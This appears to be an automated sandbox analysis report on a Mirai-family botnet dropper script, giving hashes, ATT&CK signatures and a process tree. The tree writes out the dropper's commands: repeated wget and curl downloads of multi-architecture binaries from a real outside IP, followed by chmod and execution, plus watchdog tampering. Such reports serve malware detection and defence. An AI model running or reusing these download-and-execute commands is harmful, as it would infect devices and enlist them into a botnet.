Analysis
-
max time kernel
139s -
max time network
146s -
platform
debian-9_armhf -
resource
debian9-armhf-20240729-en -
resource tags
arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
25-12-2024 07:52
Static task
static1
Behavioral task
behavioral1
Sample
1.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
1.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
1.sh
Resource
debian9-mipsbe-20240611-en
General
-
Target
1.sh
-
Size
2KB
-
MD5
f4851a3204539048964a4c54ae3802a3
-
SHA1
0c8507b985f3ae1ae758b5954cbe932419109bdd
-
SHA256
1d3098bddc2fba5485bb668b5da435ac0d740f8ec7b80d4f1a87e2f43a22ab91
-
SHA512
03f75f8f44c3259293734a04aa854fb1057172ebc51ee5277ecc63f2b5ba894d6c2163cf48467e8003b0e979ad613bfe6bf1c2be192fd5d1c92627592a5ad6a3
Malware Config
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 751 chmod 778 chmod 809 chmod 804 chmod 848 chmod 676 chmod 682 chmod 698 chmod 715 chmod 735 chmod 760 chmod 821 chmod 831 chmod 842 chmod 837 chmod -
Executes dropped EXE 15 IoCs
ioc pid Process /tmp/Space 677 Space /tmp/Space 683 Space /tmp/Space 699 Space /tmp/Space 716 Space /tmp/Space 737 Space /tmp/Space 752 Space /tmp/Space 761 Space /tmp/Space 779 Space /tmp/Space 805 Space /tmp/Space 810 Space /tmp/Space 822 Space /tmp/Space 832 Space /tmp/Space 838 Space /tmp/Space 843 Space /tmp/Space 849 Space -
Modifies Watchdog functionality 1 TTPs 6 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/misc/watchdog Space -
Enumerates running processes
Discovers information about currently running processes on the system
-
Writes file to system bin folder 6 IoCs
description ioc Process File opened for modification /sbin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /bin/watchdog Space -
resource yara_rule behavioral2/files/fstream-5.dat upx behavioral2/files/fstream-6.dat upx behavioral2/files/fstream-7.dat upx behavioral2/files/fstream-8.dat upx -
Checks CPU configuration 1 TTPs 15 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/4/status Space File opened for reading /proc/107/status Space File opened for reading /proc/311/status Space File opened for reading /proc/598/status Space File opened for reading /proc/644/status Space File opened for reading /proc/24/status Space File opened for reading /proc/777/status Space File opened for reading /proc/22/status Space File opened for reading /proc/139/status Space File opened for reading /proc/214/status Space File opened for reading /proc/16/status Space File opened for reading /proc/645/status Space File opened for reading /proc/8/status Space File opened for reading /proc/813/status Space File opened for reading /proc/279/status Space File opened for reading /proc/3/status Space File opened for reading /proc/98/status Space File opened for reading /proc/98/status Space File opened for reading /proc/105/status Space File opened for reading /proc/588/status Space File opened for reading /proc/self/auxv curl File opened for reading /proc/10/status Space File opened for reading /proc/6/status Space File opened for reading /proc/43/status Space File opened for reading /proc/3/status Space File opened for reading /proc/262/status Space File opened for reading /proc/783/status Space File opened for reading /proc/140/status Space File opened for reading /proc/815/status Space File opened for reading /proc/588/status Space File opened for reading /proc/16/status Space File opened for reading /proc/645/status Space File opened for reading /proc/self/auxv curl File opened for reading /proc/168/status Space File opened for reading /proc/300/status Space File opened for reading /proc/643/status Space File opened for reading /proc/140/status Space File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/644/status Space File opened for reading /proc/15/status Space File opened for reading /proc/14/status Space File opened for reading /proc/11/status Space File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/817/status Space File opened for reading /proc/28/status Space File opened for reading /proc/587/status Space File opened for reading /proc/10/status Space File opened for reading /proc/262/status Space File opened for reading /proc/587/status Space File opened for reading /proc/264/status Space File opened for reading /proc/108/status Space File opened for reading /proc/812/status Space File opened for reading /proc/20/status Space File opened for reading /proc/42/status Space File opened for reading /proc/29/status Space File opened for reading /proc/76/status Space File opened for reading /proc/14/status Space File opened for reading /proc/311/status Space File opened for reading /proc/24/status Space File opened for reading /proc/107/status Space File opened for reading /proc/298/status Space File opened for reading /proc/581/status Space File opened for reading /proc/584/status Space File opened for reading /proc/7/status Space -
System Network Configuration Discovery 1 TTPs 6 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 726 curl 733 cat 740 wget 745 curl 750 cat 719 wget -
Writes file to tmp directory 30 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/Space.i686 curl File opened for modification /tmp/Space.mips curl File opened for modification /tmp/Space.mpsl curl File opened for modification /tmp/Space.ppc curl File opened for modification /tmp/Space.m68k wget File opened for modification /tmp/Space 1.sh File opened for modification /tmp/Space.arm7 wget File opened for modification /tmp/Space.sh4 wget File opened for modification /tmp/busybox cp File opened for modification /tmp/Space.arm7 curl File opened for modification /tmp/Space.ppc wget File opened for modification /tmp/Space.x86 wget File opened for modification /tmp/Space.x86_64 curl File opened for modification /tmp/Space.mips wget File opened for modification /tmp/Space.arm wget File opened for modification /tmp/Space.arm curl File opened for modification /tmp/Space.arm5 curl File opened for modification /tmp/Space.arc curl File opened for modification /tmp/Space.x86 curl File opened for modification /tmp/Space.mips64 curl File opened for modification /tmp/Space.m68k curl File opened for modification /tmp/Space.arc wget File opened for modification /tmp/Space.x86_64 wget File opened for modification /tmp/Space.mpsl wget File opened for modification /tmp/Space.arm5 wget File opened for modification /tmp/Space.sparc curl File opened for modification /tmp/Space.i686 wget File opened for modification /tmp/Space.arm6 wget File opened for modification /tmp/Space.arm6 curl File opened for modification /tmp/Space.sh4 curl
Processes
-
/tmp/1.sh/tmp/1.sh1⤵
- Writes file to tmp directory
PID:645 -
/bin/cpcp /bin/busybox /tmp/2⤵
- Writes file to tmp directory
PID:647
-
-
/usr/bin/wgetwget http://154.216.20.216/hiddenbin/Space.arc2⤵
- Writes file to tmp directory
PID:650
-
-
/usr/bin/curlcurl -O http://154.216.20.216/hiddenbin/Space.arc2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:667
-
-
/bin/catcat Space.arc2⤵PID:674
-
-
/bin/chmodchmod +x 1.sh busybox Space Space.arc systemd-private-ecf16db582104ccfb48996ce0e08ea22-systemd-timedated.service-1FX4Mk2⤵
- File and Directory Permissions Modification
PID:676
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:677
-
-
/usr/bin/wgetwget http://154.216.20.216/hiddenbin/Space.x862⤵
- Writes file to tmp directory
PID:679
-
-
/usr/bin/curlcurl -O http://154.216.20.216/hiddenbin/Space.x862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:680
-
-
/bin/catcat Space.x862⤵PID:681
-
-
/bin/chmodchmod +x 1.sh busybox Space Space.arc Space.x86 systemd-private-ecf16db582104ccfb48996ce0e08ea22-systemd-timedated.service-1FX4Mk2⤵
- File and Directory Permissions Modification
PID:682
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:683
-
-
/usr/bin/wgetwget http://154.216.20.216/hiddenbin/Space.x86_642⤵
- Writes file to tmp directory
PID:685
-
-
/usr/bin/curlcurl -O http://154.216.20.216/hiddenbin/Space.x86_642⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:690
-
-
/bin/catcat Space.x86_642⤵PID:697
-
-
/bin/chmodchmod +x 1.sh busybox Space Space.arc Space.x86 Space.x86_64 systemd-private-ecf16db582104ccfb48996ce0e08ea22-systemd-timedated.service-1FX4Mk2⤵
- File and Directory Permissions Modification
PID:698
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:699
-
-
/usr/bin/wgetwget http://154.216.20.216/hiddenbin/Space.i6862⤵
- Writes file to tmp directory
PID:702
-
-
/usr/bin/curlcurl -O http://154.216.20.216/hiddenbin/Space.i6862⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:707
-
-
/bin/catcat Space.i6862⤵PID:713
-
-
/bin/chmodchmod +x 1.sh busybox Space Space.arc Space.i686 Space.x86 Space.x86_64 systemd-private-ecf16db582104ccfb48996ce0e08ea22-systemd-timedated.service-1FX4Mk2⤵
- File and Directory Permissions Modification
PID:715
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:716
-
-
/usr/bin/wgetwget http://154.216.20.216/hiddenbin/Space.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:719
-
-
/usr/bin/curlcurl -O http://154.216.20.216/hiddenbin/Space.mips2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:726
-
-
/bin/catcat Space.mips2⤵
- System Network Configuration Discovery
PID:733
-
-
/bin/chmodchmod +x 1.sh busybox Space Space.arc Space.i686 Space.mips Space.x86 Space.x86_64 systemd-private-ecf16db582104ccfb48996ce0e08ea22-systemd-timedated.service-1FX4Mk2⤵
- File and Directory Permissions Modification
PID:735
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:737
-
-
/usr/bin/wgetwget http://154.216.20.216/hiddenbin/Space.mips642⤵
- System Network Configuration Discovery
PID:740
-
-
/usr/bin/curlcurl -O http://154.216.20.216/hiddenbin/Space.mips642⤵
- Checks CPU configuration
- System Network Configuration Discovery
- Writes file to tmp directory
PID:745
-
-
/bin/catcat Space.mips642⤵
- System Network Configuration Discovery
PID:750
-
-
/bin/chmodchmod +x 1.sh busybox Space Space.arc Space.i686 Space.mips Space.mips64 Space.x86 Space.x86_64 systemd-private-ecf16db582104ccfb48996ce0e08ea22-systemd-timedated.service-1FX4Mk2⤵
- File and Directory Permissions Modification
PID:751
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:752
-
-
/usr/bin/wgetwget http://154.216.20.216/hiddenbin/Space.mpsl2⤵
- Writes file to tmp directory
PID:753
-
-
/usr/bin/curlcurl -O http://154.216.20.216/hiddenbin/Space.mpsl2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:756
-
-
/bin/catcat Space.mpsl2⤵PID:757
-
-
/bin/chmodchmod +x 1.sh busybox Space Space.arc Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_64 systemd-private-ecf16db582104ccfb48996ce0e08ea22-systemd-timedated.service-1FX4Mk2⤵
- File and Directory Permissions Modification
PID:760
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:761
-
-
/usr/bin/wgetwget http://154.216.20.216/hiddenbin/Space.arm2⤵
- Writes file to tmp directory
PID:763
-
-
/usr/bin/curlcurl -O http://154.216.20.216/hiddenbin/Space.arm2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:769
-
-
/bin/catcat Space.arm2⤵PID:776
-
-
/bin/chmodchmod +x 1.sh busybox Space Space.arc Space.arm Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_64 systemd-private-ecf16db582104ccfb48996ce0e08ea22-systemd-timedated.service-1FX4Mk2⤵
- File and Directory Permissions Modification
PID:778
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:779
-
-
/usr/bin/wgetwget http://154.216.20.216/hiddenbin/Space.arm52⤵
- Writes file to tmp directory
PID:801
-
-
/usr/bin/curlcurl -O http://154.216.20.216/hiddenbin/Space.arm52⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:802
-
-
/bin/catcat Space.arm52⤵PID:803
-
-
/bin/chmodchmod +x 1.sh busybox Space Space.arc Space.arm Space.arm5 Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_64 systemd-private-ecf16db582104ccfb48996ce0e08ea22-systemd-timedated.service-1FX4Mk2⤵
- File and Directory Permissions Modification
PID:804
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:805
-
-
/usr/bin/wgetwget http://154.216.20.216/hiddenbin/Space.arm62⤵
- Writes file to tmp directory
PID:806
-
-
/usr/bin/curlcurl -O http://154.216.20.216/hiddenbin/Space.arm62⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:807
-
-
/bin/catcat Space.arm62⤵PID:808
-
-
/bin/chmodchmod +x 1.sh busybox Space Space.arc Space.arm Space.arm5 Space.arm6 Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_64 systemd-private-ecf16db582104ccfb48996ce0e08ea22-systemd-timedated.service-1FX4Mk2⤵
- File and Directory Permissions Modification
PID:809
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:810
-
-
/usr/bin/wgetwget http://154.216.20.216/hiddenbin/Space.arm72⤵
- Writes file to tmp directory
PID:818
-
-
/usr/bin/curlcurl -O http://154.216.20.216/hiddenbin/Space.arm72⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:819
-
-
/bin/catcat Space.arm72⤵PID:820
-
-
/bin/chmodchmod +x 1.sh busybox Space Space.arc Space.arm Space.arm5 Space.arm6 Space.arm7 Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_64 systemd-private-ecf16db582104ccfb48996ce0e08ea22-systemd-timedated.service-1FX4Mk2⤵
- File and Directory Permissions Modification
PID:821
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:822
-
-
/usr/bin/wgetwget http://154.216.20.216/hiddenbin/Space.ppc2⤵
- Writes file to tmp directory
PID:828
-
-
/usr/bin/curlcurl -O http://154.216.20.216/hiddenbin/Space.ppc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:829
-
-
/bin/catcat Space.ppc2⤵PID:830
-
-
/bin/chmodchmod +x 1.sh busybox Space Space.arc Space.arm Space.arm5 Space.arm6 Space.arm7 Space.i686 Space.mips Space.mips64 Space.mpsl Space.ppc Space.x86 Space.x86_64 systemd-private-ecf16db582104ccfb48996ce0e08ea22-systemd-timedated.service-1FX4Mk2⤵
- File and Directory Permissions Modification
PID:831
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:832
-
-
/usr/bin/wgetwget http://154.216.20.216/hiddenbin/Space.sparc2⤵PID:834
-
-
/usr/bin/curlcurl -O http://154.216.20.216/hiddenbin/Space.sparc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:835
-
-
/bin/catcat Space.sparc2⤵PID:836
-
-
/bin/chmodchmod +x 1.sh busybox Space Space.arc Space.arm Space.arm5 Space.arm6 Space.arm7 Space.i686 Space.mips Space.mips64 Space.mpsl Space.ppc Space.sparc Space.x86 Space.x86_64 systemd-private-ecf16db582104ccfb48996ce0e08ea22-systemd-timedated.service-1FX4Mk2⤵
- File and Directory Permissions Modification
PID:837
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:838
-
-
/usr/bin/wgetwget http://154.216.20.216/hiddenbin/Space.m68k2⤵
- Writes file to tmp directory
PID:839
-
-
/usr/bin/curlcurl -O http://154.216.20.216/hiddenbin/Space.m68k2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:840
-
-
/bin/catcat Space.m68k2⤵PID:841
-
-
/bin/chmodchmod +x 1.sh busybox Space Space.arc Space.arm Space.arm5 Space.arm6 Space.arm7 Space.i686 Space.m68k Space.mips Space.mips64 Space.mpsl Space.ppc Space.sparc Space.x86 Space.x86_64 systemd-private-ecf16db582104ccfb48996ce0e08ea22-systemd-timedated.service-1FX4Mk2⤵
- File and Directory Permissions Modification
PID:842
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:843
-
-
/usr/bin/wgetwget http://154.216.20.216/hiddenbin/Space.sh42⤵
- Writes file to tmp directory
PID:845
-
-
/usr/bin/curlcurl -O http://154.216.20.216/hiddenbin/Space.sh42⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:846
-
-
/bin/catcat Space.sh42⤵PID:847
-
-
/bin/chmodchmod +x 1.sh busybox Space Space.arc Space.arm Space.arm5 Space.arm6 Space.arm7 Space.i686 Space.m68k Space.mips Space.mips64 Space.mpsl Space.ppc Space.sh4 Space.sparc Space.x86 Space.x86_64 systemd-private-ecf16db582104ccfb48996ce0e08ea22-systemd-timedated.service-1FX4Mk2⤵
- File and Directory Permissions Modification
PID:848
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:849
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
37KB
MD5da67a7a6d3b11c7188cdd1bfce41d8e7
SHA1b4b1365eb6e4ed53740bd8a9ff4ae1aaef12364a
SHA256f0db6dd5f4fdfa71861aabd23456868437732315b06996d032e626f671dde651
SHA512a17fc2653174ebdd687ed0dae8282c70eeb68b887a92f3be64006d18d0a1dadc2b611e9f9767e0660ab272883d85af924c94b8898e817373eae3b66402b6e337
-
Filesize
36KB
MD52a970c08a36bf8f55635f35c36450c39
SHA119178136051ca912cb63f3b660aaff2ad1a0acf2
SHA25624e0c293e85e159f78622bfd49323ffeeae27d8714a4763599eca3d9f0db3979
SHA512671d7a2cce48f7d3716d53b7c4bd365aeba2972101935aa2b5d5f637a7b888caf0e138db9c52c2a0a4e7359eb9909c04563110bc9db9110c8b649c9b9d63039f
-
Filesize
37KB
MD5ebab2dd119fb4e54698ba8726756a19c
SHA1aaf97d14cb0ad2e80794f4a8a9c37fbc182bd9e8
SHA256cc0f2a44e7f5839fbb9ef84f0a464b31305090f3219bc92ca41d6fa6e4a67f7d
SHA512bdccd5abdb52bed568292cd0fe828ac59db7530c394dc00bfad12a5ed3f60e6a5506b7a2699e88849e7288e2a51d88e993f27ced046772ab4ef7fbc0f4838a80
-
Filesize
43KB
MD56cab63028ef5fd2bac408f0ab5cf16e5
SHA1a984671f085075be3323e58181a19c862f23257b
SHA256f385391a7252cd586a0b575d08d535aefa36df27e7ea2dde44a572c5a4bb8182
SHA51231f0572bc4fd2d005cecb674ffa5ad47f058bfd09d3894d2c1b83c52a1e16c635a13b221a1e3548695258f8ace42c6e7d1bd83c046529ede891a33497dd4f84c
-
Filesize
95KB
MD5f9e24160f01569f5b8debec8d9e254e2
SHA1d91d32945f98a295a3487ff83ad9ca957cf47386
SHA2563a696bc5d8316a73d34aab7a9d799fc4030f2572d1ff36bb7b7f2fa61123d331
SHA512330c735cf8d0f1695d2257870c8a4405e8eb7183fac84559550c875a76ca2d35b65bec83834ee7f749ef9fc12e19e96897fb2bed89c5be0f996a6bcfba81a13d
-
Filesize
113KB
MD5c6c3f3981d6747a4506fc97b272fb4e6
SHA1e29b9ebea53a040f736fe362a4559362003c19fa
SHA256dce7622fc110aff0758ddfc01829c68a13faa026fdbca5b037ea222989e5d56b
SHA512dfc70bfc84e828f15b0b8dc1e77f44efcc4fdd656133c1f3ec4cc6cea6687b1a490989a718348e52079c2388096107e2b0b56c1cf6083358cd0ce6451ac48844
-
Filesize
507KB
MD5e588bcf03ae78237b58899d35f50c570
SHA12194732ebbefbc27bdae876c77f2a97a20175710
SHA2562dd1fbb8052a89f40c2e9af115d31346e554ee746e9c7a97d651e43e0609df88
SHA512904d906ec73ba5f828ee453acfceaf60d07b337a4baf1a88a2edba8d4568e4a3ceae2e24116af0a5b9c8ad194faa72abb62a72d30ae236b0852827c7bf896555